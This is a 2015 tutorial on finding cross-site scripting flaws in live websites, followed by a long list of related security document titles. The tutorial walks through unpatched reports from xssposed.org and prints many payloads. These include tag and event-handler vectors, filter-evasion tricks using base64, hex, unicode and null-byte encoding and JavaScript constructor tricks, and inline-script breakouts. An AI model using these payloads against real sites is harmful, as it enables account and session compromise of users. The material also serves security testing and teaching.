Finding XSS in Real World

Size: px
Start display at page:

Download "Finding XSS in Real World"

Transcription

1 Finding XSS in Real World by Alexander Korznikov 1 April 2015

2 Hi there, in this tutorial, I will try to explain how to find XSS in real world, using some interesting techniques. All of you know, that XSS is based on some code injection. It maybe <script> tag injection, or just an -alert()-, I will explain about that later. What do you need to find an XSS? Simply, only browser. But, if you want to find it much faster, you may use this software: 1. Firefox Browser 2. FireBug Add-on 3. HackBar Add-on 4. Google. I wanted to learn some advanced techniques of XSS, and found pretty cool way: There are tons of verified XSS s published by lot of security researchers, affecting VIP sites also. VIP website on xssposed.org is Google PR > 6 or Alexa Rate < So, I ve wrote a script that grabbed all xssposed.org XSS urls, and started to filter out not interesting fields. There were about 7500 urls. You can download a list from here: and filter out all you don t need. Real XSS (HTML Injection) Demo. I will take a real examples of XSSs from xssposed.org that were not patched a very, very long time. Our first target will be XSS report dated 14/06/2008. From that date, same XSS was reported more 3 times.

3 Take a look at the search field. Let s enter inside some RANDOMSTRING inside <xxx> tag. Purpose of this test is to validate, if there is some user input sanitation: <xxx>randomstring<xxx> As output, we see our RANDOMSTRING without <xxx> tags.

4 Let s take a look at the source: // CTRL+U in Firefox and Chrome As you can see, there is no filtration, and our <xxx> tag passed to browser as HTML. Purple color means that the <xxx> interpreted as tag. Finally, we enter: <script>alert(document.domain)</script>

5 One thing you should notice: there is no GET parameters in URL. In this example the POST was used. Open Hack-Bar add-on in Firefox, and after you come to search results, press Load URL and press on checkbox: Enable Post data Some server-side scripts, handle GET and POST requests the same way. Let s check it:

6 2. WAF Filter Evasions: What if the <script> tag is filtered out? Some WAF evasion cheat-sheets that we can use <script> tag, but I ve never seen this in real world. So I don t even try it. Some variations: <img src=x onerror=alert()> <img/src=x onerror= alert() > <svg onload=alert()> <svg/onload= alert() > <marquee onstart=alert()> <div style= width:1000px;height:1000px onmouseover=alert()>asdfa</div> <a onmouseover=alert()>some random text What if alert() is filtered? confirm() prompt() window[ alert ]( xss ) window['ale'+'rt']('xss') eval(window.atob('ywxlcnqoj3hzcycp')) //decode base64 string && execute eval(window['atob']('ywxlcnqoj3hzcycp')) window['e'+'v'+'a'+'l'](window['atob']('ywxlcnqoj3hzcycp')) Awesome evasion technique: []["filter"]["constructor"]( CODE )() eval( alert() ) will be equal to: []["filter"]["constructor"]( window['atob']('ywxlcnqoj3hzcycp') )() //equals to eval() And more evasion: []["fil"+"ter"]["constr"+"uctor"]( window['atob']('ywxlcnqoj3hzcycp') )() document.body += atob( PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+ ) //decoded base64 == <script>alert()</script> Some reference on []() functions: false =>![] true =>!![] undefined => [][[]] NaN => +[![]] 0 => +[] 1 => +!+[] 2 =>!+[]+!+[] 10 => [+!+[]]+[+[]] Array => [] Number => +[] String => []+[] Boolean =>![] Function => []["filter"] eval => []["filter"]["constructor"]( CODE )() window => []["filter"]["constructor"]("return this")()

7 Some security researchers go deeper, and develop tools like: That will convert your JavaScript CODE only with []()!+ characters. [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[]) Thanks to Patricio Palladino and Martin Kleppe. So you understand string manipulation like ale + rt Will not going to explain it again :) What if () characters are filtered? onerror=alert; throw xss document.body += string will append your string to the end of <body> tag. document.body += <script>alert\x28\x29</script> // in HEX: \x28 == ( and \x29 == ) Or you can encode the whole string <script>alert()</script> in HEX: document.body += \x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e Or just use your XSS as open redirect: document.location = //open redirect Again, document.location == document[ locati + on ]. Keep that in mind. As additional reference, I recommend to read this book: Simple HTML injections are easy to sanitize. Filter out tags and = characters, and it will be painful job of finding XSS. For example, Microsoft.NET 4 marking as Dangerous Request every request with character < followed by almost any ASCII character. I ve not found a way of evasion. So <s or <m or </ will be marked as dangerous. So the only way to bypass it is to use onmouseover=alert() > in case if = is not filtered out. ModSecurity doesn t know about confirm() Some others don t handle Unicode encoding and/or double URL encoding. If you can t use onload keyword, try onl%00oad or onl%u006fad or onl%256fad Or if = character is filtered or marked as dangerous, try onload%u003d //Null Byte / Unicode / Double URL //Unicode representation of = char Fine. This is over. Next, I will show you a real example of Inline JavaScript injection.

8 3. Inline JavaScript injection. The interesting thing, that this type of injection can be found on popular websites. Even if there a sanitation of tags, and equal character XSS is possible. If the logic of web-site (no matter if it s server-side or client-side), reflects user s input in web-page s javascript, we can utilize it for nasty purposes :) Simple example: We have URL: 1. Parameter id is handled by Server-Side logic, checking for INTEGER 2. Parameter style handled by client-side javascript and reflected in this context: var site.style = blue If we pass to the parameter style string: blue //single quote The context will be: var site.style = blue This will throw an javascript exception: SyntaxError: unterminated string literal Model: \string\trash\string\ blue //unclosed string In case of double quote, the query will be blue: SyntaxError: unterminated string literal In case if ID parameter handled by client-side, and reflected in context: var site.id = 1 Injected payload id=1 trash will look like: var site.id = 1 trash That will also throw an SyntaxError exception. In case if our payload will look like style=blue\ var site.style = blue\ Again, will be SyntaxError exception, because javascript interprets \ as escaped quote. So we can develop a noninvasive XSS locator: >trash\ single quote / double quote / space / greater sign / sting / backslash Some examples that this locator will break: //in case of no filtration HTML Code break: RED: Rendered as tags / BLUE: throwed out at the screen <a href= >trash\ style= blablabla > Javascript SyntaxErrors: RED: Syntax errors var a = blue >trash\ a=unescape( blue >trash\ ) var a = blue " >trash\

9 Sometimes web-site logic will escape or characters, so try to add to our locator \ \ >trash\ as result you may see: var a = blue\\ \\ >trash\ \ as input will be \\ as output, so our backslash is escaped, and quotation mark rendered. One more thing to remember, that we can perform all mathematical operations for all objects in javascript. For example, we can: ale + rt, or a - b or a * b. Google for more info :) Examples of nasty javascript injections with various payloads: var a = blue var a = blue - alert( xss ) - //alert() will be executed var b = [ red, blue,alert( xss ), ] var c = func( blue +alert(/xss/))//) //after // the rest of line will be commented Inline Javascript Real Demo. Our second target will be XSS report date: 28/06/2014 For making our life easier we will need FireBug and Hack-Bar Firefox addons. Entering our XSS locator ( >trash\) to the website s Find Jobs input field:

10 Got us to this URL: and as response we will get: As you can see in FireBug s output, thrown an exception - SyntaxError: missing } after property list. By clicking on the green URL right after the SyntaxError, we will get generated JavaScript source code: As you can notice, on lines 570 and 577 the code was broken: After server-side logic, out XSS locator looks like: ">trash\ So the and > tags are converted to HTML entities " > accordingly.

11 But the single quote is not converted, and only that broke the JavaScript code. Let s test for other useful characters () and enter this payload: -a()- Looks pretty good, characters aren t converted and passed to generated JavaScript. How JavaScript understands this payload? closes string, - subtracts results of a() function So, our final payload should look like: -alert( XSS )- and should not brake generated JavaScript execution. pwned again :) Ask & comment at That s all folks!

XSS Lightsabre techniques. using Hackvertor

XSS Lightsabre techniques. using Hackvertor XSS Lightsabre techniques using Hackvertor What is Hackvertor? Tag based conversion tool Javascript property checker Javascript/HTML execution DOM browser Saves you writing code Free and no ads! Whoo hoo!

More information

Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant

Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant Nethemba All About Security Highly experienced certified IT security experts (CISSP, C EH, SCSecA) Core

More information

JavaScript: Introduction to Scripting. 2008 Pearson Education, Inc. All rights reserved.

JavaScript: Introduction to Scripting. 2008 Pearson Education, Inc. All rights reserved. 1 6 JavaScript: Introduction to Scripting 2 Comment is free, but facts are sacred. C. P. Scott The creditor hath a better memory than the debtor. James Howell When faced with a decision, I always ask,

More information

A Tale of the Weaknesses of Current Client-side XSS Filtering

A Tale of the Weaknesses of Current Client-side XSS Filtering A Tale of the Weaknesses of Current Client-side XSS Filtering Sebastian Lekies (@sebastianlekies), Ben Stock (@kcotsneb) and Martin Johns (@datenkeller) Attention hackers! These slides are preliminary!

More information

Network Security Web Security

Network Security Web Security Network Security Web Security Anna Sperotto, Ramin Sadre Design and Analysis of Communication Systems Group University of Twente, 2012 Cross Site Scripting Cross Side Scripting (XSS) XSS is a case of (HTML)

More information

A Tale of the Weaknesses of Current Client-Side XSS Filtering

A Tale of the Weaknesses of Current Client-Side XSS Filtering Call To Arms: A Tale of the Weaknesses of Current Client-Side XSS Filtering Martin Johns, Ben Stock, Sebastian Lekies About us Martin Johns, Ben Stock, Sebastian Lekies Security Researchers at SAP, Uni

More information

Project 2: Web Security Pitfalls

Project 2: Web Security Pitfalls EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course

More information

Universal XSS via IE8s XSS Filters

Universal XSS via IE8s XSS Filters Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides: http://p42.us/ie8xss/ About Us Eduardo Vela Nava aka sirdarckcat http://sirdarckcat.net http://twitter.com/sirdarckcat

More information

Protection, Usability and Improvements in Reflected XSS Filters

Protection, Usability and Improvements in Reflected XSS Filters Protection, Usability and Improvements in Reflected XSS Filters Riccardo Pelizzi System Security Lab Department of Computer Science Stony Brook University May 2, 2012 1 / 19 Riccardo Pelizzi Improvements

More information

Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011

Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011 Cross Site Scripting (XSS) and PHP Security Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011 What Is Cross Site Scripting? Injecting Scripts Into Otherwise Benign and Trusted Browser Rendered

More information

Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea

Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea Bypass: History Explanation: What Is Going On Process: Things To Look For Demos: alert(1) Done Live (hopefully) CSP: Content Security

More information

1 Web Application Firewalls implementations, common problems and vulnerabilities

1 Web Application Firewalls implementations, common problems and vulnerabilities Bypassing Web Application Firewalls Pavol Lupták Pavol.Luptak@nethemba.com CEO, Nethemba s.r.o Abstract The goal of the presentation is to describe typical obfuscation attacks that allow an attacker to

More information

Web Application Attacks And WAF Evasion

Web Application Attacks And WAF Evasion Web Application Attacks And WAF Evasion Ahmed ALaa (EG-CERT) 19 March 2013 What Are We Going To Talk About? - introduction to web attacks - OWASP organization - OWASP frameworks - Crawling & info. gathering

More information

Government Girls Polytechnic, Bilaspur

Government Girls Polytechnic, Bilaspur Government Girls Polytechnic, Bilaspur Name of the Lab: Internet & Web Technology Lab Title of the Practical : Dynamic Web Page Design Lab Class: CSE 6 th Semester Teachers Assessment:20 End Semester Examination:50

More information

A talk by 13-06-2014,

A talk by 13-06-2014, A talk by 13-06-2014, http://en.wikipedia.org/wiki/monkey_test A researcher in uhr niversity ochum, A student of XSS who is working towards his PhD in XSS An XSSer / An XSS Enthusiast http://www.tubechop.com/watch/2670518

More information

Browser tools that make web development easier. Alan Seiden Consulting alanseiden.com

Browser tools that make web development easier. Alan Seiden Consulting alanseiden.com Browser tools that make web development easier alanseiden.com My focus Advancing PHP on IBM i PHP project leader, Zend/IBM Toolkit Contributor, Zend Framework DB2/i enhancements Developer, Best Web Solution,

More information

Web Application Guidelines

Web Application Guidelines Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security

More information

Complete Cross-site Scripting Walkthrough

Complete Cross-site Scripting Walkthrough Complete Cross-site Scripting Walkthrough Author : Ahmed Elhady Mohamed Email : ahmed.elhady.mohamed@gmail.com website: www.infosec4all.tk blog : www.1nfosec4all.blogspot.com/ [+] Introduction wikipedia

More information

Intrusion detection for web applications

Intrusion detection for web applications Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities

More information

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.

More information

Attacks on Clients: Dynamic Content & XSS

Attacks on Clients: Dynamic Content & XSS Software and Web Security 2 Attacks on Clients: Dynamic Content & XSS (Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS) sws2 1 Recap from last lecture Attacks on web server: attacker/client

More information

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji Illinois Institute Of Technology Prateek Saxena UC Berkeley Dawn Song UC Berkeley 1 A Cross-Site Scripting Attack

More information

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca)

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Bug Report Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.

More information

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security

More information

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project

More information

TCP/IP Networking, Part 2: Web-Based Control

TCP/IP Networking, Part 2: Web-Based Control TCP/IP Networking, Part 2: Web-Based Control Microchip TCP/IP Stack HTTP2 Module 2007 Microchip Technology Incorporated. All Rights Reserved. Building Embedded Web Applications Slide 1 Welcome to the next

More information

HTTPParameter Pollution. ChrysostomosDaniel

HTTPParameter Pollution. ChrysostomosDaniel HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider

More information

Advanced XSS. Nicolas Golubovic

Advanced XSS. Nicolas Golubovic Advanced XSS Nicolas Golubovic Image courtesy of chanpipat / FreeDigitalPhotos.net Today's menu 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course:

More information

IMRG Peermap API Documentation V 5.0

IMRG Peermap API Documentation V 5.0 IMRG Peermap API Documentation V 5.0 An Introduction to the IMRG Peermap Service... 2 Using a Tag Manager... 2 Inserting your Unique API Key within the Script... 2 The JavaScript Snippet... 3 Adding the

More information

Login with Amazon. Getting Started Guide for Websites. Version 1.0

Login with Amazon. Getting Started Guide for Websites. Version 1.0 Login with Amazon Getting Started Guide for Websites Version 1.0 Login with Amazon: Getting Started Guide for Websites Copyright 2016 Amazon Services, LLC or its affiliates. All rights reserved. Amazon

More information

Client-side Web Engineering From HTML to AJAX

Client-side Web Engineering From HTML to AJAX Client-side Web Engineering From HTML to AJAX SWE 642, Spring 2008 Nick Duan 1 What is Client-side Engineering? The concepts, tools and techniques for creating standard web browser and browser extensions

More information

Short notes on webpage programming languages

Short notes on webpage programming languages Short notes on webpage programming languages What is HTML? HTML is a language for describing web pages. HTML stands for Hyper Text Markup Language HTML is a markup language A markup language is a set of

More information

Cross Site Scripting Prevention

Cross Site Scripting Prevention Project Report CS 649 : Network Security Cross Site Scripting Prevention Under Guidance of Prof. Bernard Menezes Submitted By Neelamadhav (09305045) Raju Chinthala (09305056) Kiran Akipogu (09305074) Vijaya

More information

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST. CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape

More information

The Past, Present and Future of XSS Defense Jim Manico. HITB 2011 Amsterdam

The Past, Present and Future of XSS Defense Jim Manico. HITB 2011 Amsterdam The Past, Present and Future of XSS Defense Jim Manico HITB 2011 Amsterdam 0 Jim Manico Managing Partner, Infrared Security Web Developer, 15+ Years OWASP Connections Committee Chair OWASP ESAPI Project

More information

OPENTABLE GROUP SEARCH MODULE GETTING STARTED ADD RESERVATIONS TO YOUR WEBSITE

OPENTABLE GROUP SEARCH MODULE GETTING STARTED ADD RESERVATIONS TO YOUR WEBSITE ADD RESERVATIONS TO YOUR WEBSITE OPENTABLE GROUP SEARCH MODULE The group search module allows users to select a specific restaurant location from a list and search tables at that location. The code below

More information

Bypassing Internet Explorer s XSS Filter

Bypassing Internet Explorer s XSS Filter Bypassing Internet Explorer s XSS Filter Or: Oops, that s not supposed to happen. Carlos @RTWaysea About Me Mechanical Drafting Background Engine parts, Architectural fixtures, etc. Friend said Try This

More information

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory

More information

XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0. Author of OWASP Xenotix XSS Exploit Framework opensecurity.in

XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0. Author of OWASP Xenotix XSS Exploit Framework opensecurity.in THE ULTIMATE XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0 Ajin Abraham Author of OWASP Xenotix XSS Exploit Framework opensecurity.in The quick guide for developers to protect their web applications from

More information

Uploaded images filter evasion for carrying out XSS attacks

Uploaded images filter evasion for carrying out XSS attacks February 25, 2007 Uploaded images filter evasion for carrying out XSS attacks Digitаl Security Research Group (DSecRG) Alexander Polyakov a.polyakov@dsec.ru http://dsecrg.ru Table of contents Introduction...3

More information

HTML Form Widgets. Review: HTML Forms. Review: CGI Programs

HTML Form Widgets. Review: HTML Forms. Review: CGI Programs HTML Form Widgets Review: HTML Forms HTML forms are used to create web pages that accept user input Forms allow the user to communicate information back to the web server Forms allow web servers to generate

More information

Web Development CSE2WD Final Examination June 2012. (a) Which organisation is primarily responsible for HTML, CSS and DOM standards?

Web Development CSE2WD Final Examination June 2012. (a) Which organisation is primarily responsible for HTML, CSS and DOM standards? Question 1. (a) Which organisation is primarily responsible for HTML, CSS and DOM standards? (b) Briefly identify the primary purpose of the flowing inside the body section of an HTML document: (i) HTML

More information

Blackbox Reversing of XSS Filters

Blackbox Reversing of XSS Filters Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net Introduction Web applications are the future Reversing web apps blackbox reversing very different environment and tools Cross-site scripting

More information

SQL Injection. The ability to inject SQL commands into the database engine through an existing application

SQL Injection. The ability to inject SQL commands into the database engine through an existing application SQL Injection The ability to inject SQL commands into the database engine through an existing application 1 What is SQL? SQL stands for Structured Query Language Allows us to access a database ANSI and

More information

Unraveling Unicode: A Bag of Tricks for Bug Hunting

Unraveling Unicode: A Bag of Tricks for Bug Hunting Unraveling Unicode: A Bag of Tricks for Bug Hunting Black Hat USA July 2009 Chris Weber www.lookout.net chris@casabasecurity.com Casaba Security Can you tell the difference? How about now? The Transformers

More information

MASTERTAG DEVELOPER GUIDE

MASTERTAG DEVELOPER GUIDE MASTERTAG DEVELOPER GUIDE TABLE OF CONTENTS 1 Introduction... 4 1.1 What is the zanox MasterTag?... 4 1.2 What is the zanox page type?... 4 2 Create a MasterTag application in the zanox Application Store...

More information

JavaFX Mashups. #javafxmashups. @gunnarsson: Martin Gunnarsson, Epsilon @per_siko: Pär Sikö, Jayway. fredag 26 oktober 12

JavaFX Mashups. #javafxmashups. @gunnarsson: Martin Gunnarsson, Epsilon @per_siko: Pär Sikö, Jayway. fredag 26 oktober 12 JavaFX Mashups @gunnarsson: Martin Gunnarsson, Epsilon @per_siko: Pär Sikö, Jayway #javafxmashups Loading a web page Architecture Presentation Processing WebView WebEngine Simple web page public class

More information

Visualizing an OrientDB Graph Database with KeyLines

Visualizing an OrientDB Graph Database with KeyLines Visualizing an OrientDB Graph Database with KeyLines Visualizing an OrientDB Graph Database with KeyLines 1! Introduction 2! What is a graph database? 2! What is OrientDB? 2! Why visualize OrientDB? 3!

More information

JavaScript Testing. Beginner's Guide. Liang Yuxian Eugene. Test and debug JavaScript the easy way PUBLISHING MUMBAI BIRMINGHAM. k I I.

JavaScript Testing. Beginner's Guide. Liang Yuxian Eugene. Test and debug JavaScript the easy way PUBLISHING MUMBAI BIRMINGHAM. k I I. JavaScript Testing Beginner's Guide Test and debug JavaScript the easy way Liang Yuxian Eugene [ rwtmm k I I PUBLISHING I BIRMINGHAM MUMBAI loading loading runtime Preface 1 Chapter 1: What is JavaScript

More information

Web App Development Session 1 - Getting Started. Presented by Charles Armour and Ryan Knee for Coder Dojo Pensacola

Web App Development Session 1 - Getting Started. Presented by Charles Armour and Ryan Knee for Coder Dojo Pensacola Web App Development Session 1 - Getting Started Presented by Charles Armour and Ryan Knee for Coder Dojo Pensacola Tools We Use Application Framework - Compiles and Runs Web App Meteor (install from https://www.meteor.com/)

More information

EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS

EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS SEPTEMBER 2015 MAZIN AHMED MAZIN@MAZINAHMED.NET @MAZEN160 Table of Contents Topic Page Number Abstract 3 Introduction 3 Testing Environment 4 Products

More information

Website Login Integration

Website Login Integration SSO Widget Website Login Integration October 2015 Table of Contents Introduction... 3 Getting Started... 5 Creating your Login Form... 5 Full code for the example (including CSS and JavaScript):... 7 2

More information

JavaScript Basics & HTML DOM. Sang Shin Java Technology Architect Sun Microsystems, Inc. sang.shin@sun.com www.javapassion.com

JavaScript Basics & HTML DOM. Sang Shin Java Technology Architect Sun Microsystems, Inc. sang.shin@sun.com www.javapassion.com JavaScript Basics & HTML DOM Sang Shin Java Technology Architect Sun Microsystems, Inc. sang.shin@sun.com www.javapassion.com 2 Disclaimer & Acknowledgments Even though Sang Shin is a full-time employee

More information

Stopping SQL Injection and. Manoranjan (Mano) Paul. Track: Operating Systems Security - Are we there yet?

Stopping SQL Injection and. Manoranjan (Mano) Paul. Track: Operating Systems Security - Are we there yet? Stopping SQL Injection and Crossing Over Cross-site Scripting Track: Operating Systems Security - Are we there yet? Manoranjan (Mano) Paul CISSP, MCSD, MCAD, CompTIA Network+, ECSA/LPT Catalyst(s) SQL

More information

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011 Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing

More information

Cross-Site Scripting

Cross-Site Scripting Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some

More information

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance

More information

Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map

Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map Erwin Adi and Irene Salomo School of Computer Science BINUS International BINUS University, Indonesia

More information

Security at Scale: Effective approaches to web application security. zane@etsy.com @zanelackey

Security at Scale: Effective approaches to web application security. zane@etsy.com @zanelackey Security at Scale: Effective approaches to web application security zane@etsy.com @zanelackey Who am I? Engineering Manager @ Etsy Lead appsec/netsec/seceng teams Formerly @ isec Partners Books/presentations

More information

External Network & Web Application Assessment. For The XXX Group LLC October 2012

External Network & Web Application Assessment. For The XXX Group LLC October 2012 External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution

More information

Web Programming Step by Step

Web Programming Step by Step Web Programming Step by Step Lecture 13 Introduction to JavaScript Reading: 7.1-7.4 Except where otherwise noted, the contents of this presentation are Copyright 2009 Marty Stepp and Jessica Miller. Client-side

More information

Finding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.

Finding Your Way in Testing Jungle. A Learning Approach to Web Security Testing. Finding Your Way in Testing Jungle A Learning Approach to Web Security Testing. Research Questions Why is it important to improve website security? What techniques are already in place to test security?

More information

InternetVista Web scenario documentation

InternetVista Web scenario documentation InternetVista Web scenario documentation Version 1.2 1 Contents 1. Change History... 3 2. Introduction to Web Scenario... 4 3. XML scenario description... 5 3.1. General scenario structure... 5 3.2. Steps

More information

«W3Schools Home Next Chapter» JavaScript is THE scripting language of the Web.

«W3Schools Home Next Chapter» JavaScript is THE scripting language of the Web. JS Basic JS HOME JS Introduction JS How To JS Where To JS Statements JS Comments JS Variables JS Operators JS Comparisons JS If...Else JS Switch JS Popup Boxes JS Functions JS For Loop JS While Loop JS

More information

TweetAttacks Pro. User Manual

TweetAttacks Pro. User Manual TweetAttacks Pro User Manual The ultimate twitter auto follower, auto unfollower, tweet scraper, reply generator, auto retweeter, tweet spinner, mass retweeter and tweet scheduler with socialoomph integration.

More information

Webapps Vulnerability Report

Webapps Vulnerability Report Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during

More information

Visualizing a Neo4j Graph Database with KeyLines

Visualizing a Neo4j Graph Database with KeyLines Visualizing a Neo4j Graph Database with KeyLines Introduction 2! What is a graph database? 2! What is Neo4j? 2! Why visualize Neo4j? 3! Visualization Architecture 4! Benefits of the KeyLines/Neo4j architecture

More information

Next Generation Clickjacking

Next Generation Clickjacking Next Generation Clickjacking New attacks against framed web pages Black Hat Europe, 14 th April 2010 Paul Stone paul.stone@contextis.co.uk Coming Up Quick Introduction to Clickjacking Four New Cross-Browser

More information

Bypassing XSS Auditor: Taking Advantage of Badly Written PHP Code

Bypassing XSS Auditor: Taking Advantage of Badly Written PHP Code Bypassing XSS Auditor: Taking Advantage of Badly Written PHP Code Anastasios Stasinopoulos, Christoforos Ntantogian, Christos Xenakis Department of Digital Systems, University of Piraeus {stasinopoulos,

More information

CIS 467/602-01: Data Visualization

CIS 467/602-01: Data Visualization CIS 467/602-01: Data Visualization HTML, CSS, SVG, (& JavaScript) Dr. David Koop Assignment 1 Posted on the course web site Due Friday, Feb. 13 Get started soon! Submission information will be posted Useful

More information

AJAX and JSON Lessons Learned. Jim Riecken, Senior Software Engineer, Blackboard Inc.

AJAX and JSON Lessons Learned. Jim Riecken, Senior Software Engineer, Blackboard Inc. AJAX and JSON Lessons Learned Jim Riecken, Senior Software Engineer, Blackboard Inc. About Me Jim Riecken Senior Software Engineer At Blackboard for 4 years. Work out of the Vancouver office. Working a

More information

Dynamic Web-Enabled Data Collection

Dynamic Web-Enabled Data Collection Dynamic Web-Enabled Data Collection S. David Riba, Introduction Web-based Data Collection Forms Error Trapping Server Side Validation Client Side Validation Dynamic generation of web pages with Scripting

More information

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000) Security What about MongoDB? Even though MongoDB doesn t use SQL, it can be vulnerable to injection attacks db.collection.find( {active: true, $where: function() { return obj.credits - obj.debits < req.body.input;

More information

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Application Security Testing Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Agenda The most common security vulnerabilities you should test for Understanding the problems

More information

JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK

JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK Programming for Digital Media EE1707 JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK 1 References and Sources 1. DOM Scripting, Web Design with JavaScript

More information

Ruby on Rails Security. Jonathan Weiss, 30.12.2007 Peritor Wissensmanagement GmbH

Ruby on Rails Security. Jonathan Weiss, 30.12.2007 Peritor Wissensmanagement GmbH Ruby on Rails Security Jonathan Weiss, 30.12.2007 Peritor Wissensmanagement GmbH Who am I? Jonathan Weiss Consultant for Peritor Wissensmanagement GmbH Specialized in Rails, Scaling, and Code Review Active

More information

(WAPT) Web Application Penetration Testing

(WAPT) Web Application Penetration Testing (WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:

More information

Course Information Course Number: IWT 1229 Course Name: Web Development and Design Foundation

